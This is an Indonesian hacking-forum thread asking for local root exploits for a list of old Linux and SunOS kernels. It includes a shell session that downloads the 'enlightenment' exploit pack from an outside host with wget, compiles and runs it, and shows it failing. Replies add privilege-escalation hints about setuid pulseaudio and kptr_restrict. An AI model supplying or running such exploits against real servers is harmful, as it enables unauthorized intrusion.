butuh bantuan rooting

  1. Linux 2.6.32-358.14.1.el6.i686 #1 SMP Tue Jul 16 21:12:30 UTC 2013 i686
  2. Linux 2.6.18-238.19.1.el5.028stab092.2 #1 SMP Thu Jul 21 19:23:22 MSD 2011 i686
  3. Linux 3.6.8-grsec-pgr #2 SMP Wed May 15 00:41:32 CEST 2013 i686
  4. Linux 2.6.32-358.14.1.el6.x86_64 #1 SMP Tue Jul 16 23:51:20 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
  5. SunOS 5.8 Generic_108528-17 sun4u
  6. SunOS 5.10 Generic_147147-26 sun4v sparc SUNW,T5240

Buat yang jago r00ter
Ane mau nanya nich, kalau ada yang pernah berhasil nge root salah satu atau mungkin semua kernel di atas share dong exploitnya. Masih newbie banget nih soalnya.

Udah coba beberapa exploit, autoroot, tapi belum berhasil.
Pernah juga coba enlightenment.tgz, tapi kok malah error
Pulseaudio does not exist!
[+] Personality set to: PER_SVR4

gak keluar pilihan exploitnya, gak seperti yang ada di video om rusuh.

[code]sh-4.1$ wget http://grsecurity.net/~spender/exploits/enlightenment.tgz

sh-4.1$ tar xfzv enlightenment.tgz

sh-4.1$ cd enlightenment

sh-4.1$ ./run_null_exploits.sh

Compiling exp_abacus.c…OK.
Compiling exp_cheddarbay.c…OK.
Compiling exp_ingom0wnar.c…OK.
Compiling exp_moosecox.c…OK.
Compiling exp_paokara.c…OK.
Compiling exp_powerglove.c…OK.
Compiling exp_sieve.c…OK.
Compiling exp_therebel.c…OK.
Compiling exp_vmware.c…OK.
Compiling exp_wunderbar.c…OK.
Pulseaudio does not exist!
[+] Personality set to: PER_SVR4

sh-4.1$[/code]

:hah kernel 2013

ane jg mentok kl suruh nyari localroot nya,
makulm masih newbie, bingung mau nyari kmn lg,
gak ad yg cocok,

ane belum pernah ngecroot :dead:

susah sekarang nyari local exploit apalagi kernel 2012 ketas.
ga kayak waktu dulu taon 2007 sampe 2009 gampang nyarinya.

:phew:

gw ruting pake sepatu :phew:

cuma pernah ngroot lepis sendiri… :pasrah:

:panik:
kalo ada yg bisa, pasti dewa nih…
:lemes:

  1. Linux 3.6.8-grsec-pgr #2 SMP Wed May 15 00:41:32 CEST 2013 i686 <<< gr-sec

do you know grsecurity bro? do you want to kill our brain?

nice share bro … and nice exploit !

ada exploit buat kernel 2.6.32-5-amd64 ga om, pleaase…??

pulseaudionya suid root gak?

terus cek /proc/sys/kernel/kptr_restrict, kalau nilainya 1 jelas ga bisa… :cambuk: